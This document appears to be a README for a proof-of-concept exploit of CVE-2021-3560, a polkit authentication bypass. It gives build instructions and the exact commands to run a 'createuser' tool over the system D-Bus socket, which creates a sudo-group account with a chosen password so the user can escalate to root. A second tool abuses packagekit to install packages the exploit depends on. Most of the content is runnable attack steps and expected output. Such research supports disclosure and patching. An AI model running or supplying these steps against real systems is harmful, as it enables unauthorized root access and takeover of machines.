This directory contains a proof of concept exploit for CVE-2021-3560: an authentication bypass vulnerability in polkit.
The vulnerability is described in this blog post.
Instructions for building the PoC:
git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse
mkdir build
cd build
cmake ..
makeThe PoC exploits an authentication bypass vulnerability in polkit
to create a new user account with sudo privileges.
Note: if the PoC is run in a graphical session such as GNOME, then it
will cause the dialog box for the authentication agent to pop up
repeatedly, which is very annoying and also prevents the PoC from
working. That is why the first step in the instructions below is
ssh localhost.
ssh localhost
cd build
./createuser /var/run/dbus/system_bus_socket boris iaminvincible!Assuming that the PoC is successful, there should now be a user named
boris:
$ id boris
uid=1008(boris) gid=1008(boris) groups=1008(boris),27(sudo)You can now login as boris, using password "iaminvincible!":
su - boris # password: iaminvincible!And since boris is a member of the sudo group, you can now escalate
privileges to root.
The createuser PoC depends on two packages being installed:
accountsservice and gnome-control-center. Those packages might not
be installed on some systems, such as a non-graphical RHEL server.
However, the polkit vulnerability can also be used to exploit
packagekit, which means that we
can use the vulnerability to install accountsservice and
gnome-control-center.
You can run the packagekit PoC like this:
./installpackage /var/run/dbus/system_bus_socket gnome-control-center